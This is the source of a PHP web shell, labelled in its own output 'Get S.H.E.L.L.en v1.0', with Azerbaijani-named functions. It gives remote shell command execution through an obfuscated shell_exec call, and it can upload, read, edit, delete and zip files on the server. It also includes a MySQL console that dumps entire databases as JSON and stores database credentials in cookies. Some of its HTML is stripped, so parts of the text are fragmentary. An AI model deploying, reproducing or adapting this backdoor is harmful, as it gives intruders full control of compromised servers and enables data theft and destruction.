".htmlspecialchars(empty($hisse)&&$ii!=count($parse)?'/':$hisse).""; } $sonDir = implode("/", $sonDir); print $sonDir . '      ( Reset | Go to )'; } function sizeFormat($bytes) { if($bytes>=1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' Gb'; } else if($bytes>=1048576) { $bytes = number_format($bytes / 1048576, 2) . ' Mb'; } else if($bytes>=1024) { $bytes = number_format($bytes / 1024, 2) . ' Kb'; } else { $bytes = $bytes . ' b'; } return $bytes; } function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else if (is_string ($d)) { return utf8_encode($d); } return $d; } function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir . "/" . $object)) { rrmdir($dir . "/" . $object); } else { unlink($dir . "/" . $object ); } } } rmdir( $dir ); } } $default_dir = getcwd(); if(isset($_POST['qovluq']) && is_string($_POST['qovluq']) ) { $default_dir = empty($_POST['qovluq']) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST['qovluq']))); $c_h_dir_comm = 'c'.'hd'.'ir'; $c_h_dir_comm($default_dir); } $default_dir = str_replace("\\", "/", $default_dir); if(isset($_GET['ne']) && $_GET['ne']=="pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}","",$pInf); exit(); } else if($ne=="fayl_yukle" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $faylAdi = basename(deshifrele(urldecode($_POST['fayl']))); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { header("Content-Disposition: attachment; filename=".basename($faylAdi)); header("Content-Type: application/octet-stream"); header('Content-Length: ' . filesize($default_dir . $ayirici . $faylAdi)); readfile($default_dir . $ayirici . $faylAdi); exit(); } } else if($ne=="fayl_sil" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $faylAdi = basename(deshifrele(urldecode($_POST['fayl']))); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { unlink($default_dir . $ayirici . $faylAdi); } } else if($ne=="fayl_sifirla" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $faylAdi = basename(deshifrele(urldecode($_POST['fayl']))); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else if($ne=="fayl_yarat" && isset($_POST['ad']) && !empty($_POST['ad'])) { $faylAdi = basename(urldecode($_POST['ad'])); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $ayirici . $faylAdi) ) { print ''; } else { file_put_contents($default_dir . $ayirici . $faylAdi, ''); } } else if($ne=="papka_yarat" && isset($_POST['ad']) && !empty($_POST['ad'])) { $papkaAdi = basename(urldecode($_POST['ad'])); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($papkaAdi,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $ayirici . $papkaAdi) ) { print ''; } else { mkdir($default_dir . $ayirici . $papkaAdi); } } else if($ne=="fayl_ad_deyish" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl'])) && isset($_POST['new_name']) && is_string($_POST['new_name']) && !empty($_POST['new_name'])) { $faylAdi = basename(deshifrele(urldecode($_POST['fayl']))); $faylYeniAd = basename(urldecode($_POST['new_name'])); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { rename($default_dir . $ayirici . $faylAdi , $default_dir . $ayirici . $faylYeniAd); } } else if( $ne == 'skl_d_t' && isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = deshifrele(urldecode($_POST['t'])); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $parol = isset($_COOKIE['parol']) ? $_COOKIE['parol'] : ''; $baza = isset($_COOKIE['baza']) ? $_COOKIE['baza'] : ''; $bazaStr = empty($baza) ? '' : 'dbname=' . $baza . ';'; if( !empty( $host ) && !empty($baza) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $bazaStr , $user , $parol,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); header('Content-disposition: attachment; filename=d_' . basename(htmlspecialchars($tableName)) . '.json'); header('Content-type: application/json'); echo json_encode($data); } else { print 'Table not found!'; } } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $ne == 'skl_d' ) { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $parol = isset($_COOKIE['parol']) ? $_COOKIE['parol'] : ''; $baza = isset($_COOKIE['baza']) ? $_COOKIE['baza'] : ''; $bazaStr = empty($baza) ? '' : 'dbname=' . $baza . ';'; if( !empty( $host ) && !empty($baza) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $bazaStr , $user , $parol,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($baza)); $tables = $tables->fetchAll(); foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header('Content-disposition: attachment; filename=d_b_' . basename(htmlspecialchars($baza)) . '.json'); header('Content-type: application/json'); echo json_encode( utf8ize( $allData) ); } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $ne == 'ziple' && isset($_POST['save_to'] , $_POST['zf']) && is_string($_POST['save_to']) && !empty($_POST['save_to']) && !in_array($_POST['save_to'] , array('.' , '..' , './' , '../')) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $save_to = deshifrele(urldecode($_POST['save_to'])); $rootPath = realpath(deshifrele(urldecode($_POST['zf']))); $fileName1 = 'bak_'.microtime(1) . '_' . rand(1000, 99999) . '.zip'; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if( is_dir( $save_to ) && is_dir( $rootPath ) && is_writable( $save_to ) ) { set_time_limit(0); $zip = new ZipArchive(); $zip->open( $fileName , ZipArchive::CREATE | ZipArchive::OVERWRITE ); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print 'Saved!
'; } else { print 'Dir is not writeable!
';var_dump(( $save_to ) ); } } else if( $ne == 'papka_sil' && isset($_POST['zf']) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $rootPath = realpath(deshifrele(urldecode($_POST['zf']))); if( is_dir( $rootPath ) ) { set_time_limit(0); rrmdir( $rootPath ); } else { print 'Dir is not writeable!
';var_dump(( $save_to ) ); } } else if($ne == 'fayl_upl' && isset($_FILES['ufayl'])) { move_uploaded_file($_FILES['ufayl']['tmp_name'], $default_dir . '/' . $_FILES['ufayl']['name']); print "Upload oldu deyesen."; } ?> Get S.H.E.L.L.en v1.0 | BY .. Uname: " . php_uname() . "
"; print "User: ".getmyuid()." (".get_current_user().")
"; print "Group: ".getmygid()." (".$qrup.")
"; } else { print "Uname: " . php_uname() . "
"; print "User: ".getmyuid()." (".get_current_user().")
"; print "Group: ".getmygid()."
"; } print "Disable functions: " . (implode(", ", $baqliFunksiyalar)==""?"yoxdu :)":"". implode(", ", $baqliFunksiyalar)) . "
"; print "Safe mode: " . ($safeMode===true?"On":"Off") . "[ PHPinfo ]
"; qovluquYaz(); print '
'; if($ne=="phpinfo") { print "
"; } else if($ne=="sistem_kom") { if( isset( $_POST['kom'] ) && is_string($_POST['kom']) && !empty($_POST['kom']) ) { $komanda = deshifrele(urldecode($_POST['kom'])); $k = 'sh'; $k.='el'; $k.='l_e'; $k.='xe'; $k.='c'; $output = $k($komanda); print '
' . htmlspecialchars($output) . '

'; } print ' '; } else if($ne=="fayl_oxu" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $faylAdi = basename(deshifrele(urldecode($_POST['fayl']))); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? " onclick='sehife(\"?ne=fayl_redakte&fayl=".urlencode(urlencode(shifrele($faylAdi)))."&qovluq=".urlencode(urlencode(shifrele($default_dir)))."\")'" : " disabled"; print "
Fayl adı: ".htmlspecialchars($faylAdi)."
"; print "
".highlight_string(file_get_contents($default_dir . $ayirici . $faylAdi), true)."
"; } } else if($ne == 'skl') { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $parol = isset($_COOKIE['parol']) ? $_COOKIE['parol'] : ''; $baza = isset($_COOKIE['baza']) ? $_COOKIE['baza'] : ''; if( isset($_POST['host'] , $_POST['user'] , $_POST['parol']) && is_string($_POST['host']) && is_string($_POST['user']) && is_string($_POST['parol']) ) { $host = $_POST['host']; $user = $_POST['user']; $parol = $_POST['parol']; $baza = ''; setcookie('host' , $host , time() + 360000); setcookie('user' , $user , time() + 360000); setcookie('parol' , $parol , time() + 360000); setcookie('baza' , $baza , time() + 360000); } if( isset($_POST['baza']) && is_string($_POST['baza']) ) { $baza = $_POST['baza']; setcookie('baza' , $baza , time() + 360000); } $bazaStr = empty($baza) ? '' : 'dbname=' . $baza . ';'; ?>
"SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query('SELECT schema_name FROM information_schema.schemata'); print '
'; if( !empty($baza) ) { $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($baza)); $tables = $tables->fetchAll(); print '
'; print '!! Dump DB !!
'; foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; print ''.htmlspecialchars($tableName).'
'; } print '
'; print '
'; if( isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = deshifrele(urldecode($_POST['t'])); print 'Table: ' . htmlspecialchars($tableName) . ' ( Dump )
'; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($baza , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $dataCount = $pdo->query('SELECT count(0) AS ss from `' . $tableName . '`'); $dataCount = (int)$dataCount->fetchColumn(); print 'Count: ' . $dataCount . '

'; $pages = ceil($dataCount / 100); $currentPage = isset($_POST['sehife']) && is_numeric($_POST['sehife']) && $_POST['sehife'] >= 1 && $_POST['sehife'] <= $pages ? (int)$_POST['sehife'] : 1; for ( $p = 1; $p <= $pages; $p++ ) { print '' . $p . ' '; } print '

'; $start = 100 * ($currentPage - 1); $data = $pdo->query('SELECT * FROM `' . $tableName .'` LIMIT '.$start.' , 100'); $data = $data->fetchAll(); print ''; foreach( $columns AS $columnInf ) { print ''; } print ''; foreach( $data AS $row ) { print ''; foreach( $row AS $key=>$val ) { print ''; } print ''; } print '
' . htmlspecialchars($columnInf['column_name']) . '
' . $val . '
'; } else { print 'Table not found!'; } } else if ( isset($_POST['emr']) && is_string($_POST['emr']) && !empty($_POST['emr']) ) { $emr = deshifrele(urldecode($_POST['emr'])); print 'SQL emr: ' . htmlspecialchars($emr) . '
'; $data = $pdo->query( $emr ); $data = $data->fetchAll(); print ''; if( count($data) > 0 ) { print ''; foreach( $data[0] AS $key=>$val ) { print ''; } print ''; } print ''; foreach( $data AS $row ) { print ''; foreach( $row AS $key=>$val ) { print ''; } print ''; } print '
' . $key . '
' . $val . '
'; } print '
'; print '
'; print '
'; } } catch (Exception $e) { print $e->getMessage(); } } } else if($ne=="fayl_redakte" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST['fayl'])))); $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($faylAdi,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ""; if(isset($_POST['content']) && isset($_POST['took']) && $_POST['took']!="" && isset($_SESSION['ys_took']) && $_SESSION['ys_took']==$_POST['took'] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION['ys_took']); $content = $_POST['content']; $cc = array('a','i','e','s','l','b','u','o','p','h',"(",")","<",">","?",";","[","]","$"); foreach($cc AS $k1=>$v1) { $content = str_replace('|:'.$k1.':|' , $v1 , $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " Uğurla yadda saxlanıldı!"; } $oxuUrl = "?ne=fayl_oxu&fayl=".urlencode(urlencode(shifrele($faylAdi)))."&qovluq=".urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? "" : " disabled"; print "
Fayl adı: ".htmlspecialchars($faylAdi)."
$status
"; print ""; } else { print 'Error! ' . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if(is_dir($default_dir)) { if(is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach($qovluqIchi AS &$emelemnt) { $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($emelemnt,0,1)!="/" ? "/" : ""; if(is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "0".$emelemnt; } else { $emelemnt = "1".$emelemnt; } } asort($qovluqIchi); print ""; foreach($qovluqIchi AS $element) { $url = ""; $element = substr($element,1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir,strlen($default_dir)-1)!="/" && substr($element,0,1)!="/" ? "/" : ""; $adi = is_dir($faylAdiTam) ? "[ $element ]" : $element; $classN = ""; if(is_dir($faylAdiTam)) { if($element==".") { $url = "?qovluq=".urlencode(urlencode(shifrele($default_dir))); } else if($element=="..") { $yeniUrl = explode("/",$default_dir); foreach(array_reverse($yeniUrl) AS $j=>$qq) { if(trim($qq)!="") { unset($yeniUrl[count($yeniUrl)-$j-1]); break; } } $url = "?qovluq=".urlencode(urlencode(shifrele(implode("/",$yeniUrl)))); } else { $url = "?qovluq=".urlencode(urlencode(shifrele($faylAdiTam))); } $classN = " style='font-weight: 600;'"; } else { $url = "?ne=fayl_oxu&fayl=".urlencode(urlencode(shifrele($element)))."&qovluq=".urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable( $faylAdiTam ) && is_writeable( $faylAdiTam ); print '' . substr(sprintf('%o', fileperms(( $faylAdiTam ))), -4) . ' '; } } else { print "
Permissions denided!
"; } } } print "
sFaylSizeTarixOwner/GroupPermissionsActions
'.htmlspecialchars($adi).' ' . ($fayldi?sizeFormat(filesize($faylAdiTam)):'') . ' ' . (date('d M Y, H:i' , filectime($faylAdiTam))) . ' ' . htmlspecialchars(fileowner($faylAdiTam)) . ' '; if( is_file($faylAdiTam) ) { print (' Download | ') . (' Rename | ') . (' Truncate | ') . (' Delete'); } else if( $adi != '[ . ]' && $adi != '[ .. ]' ) { print (' Zip | ') . (' Sil'); } print '
"; ?>
Yeni fayl | Yeni papka
Icra edin
SQL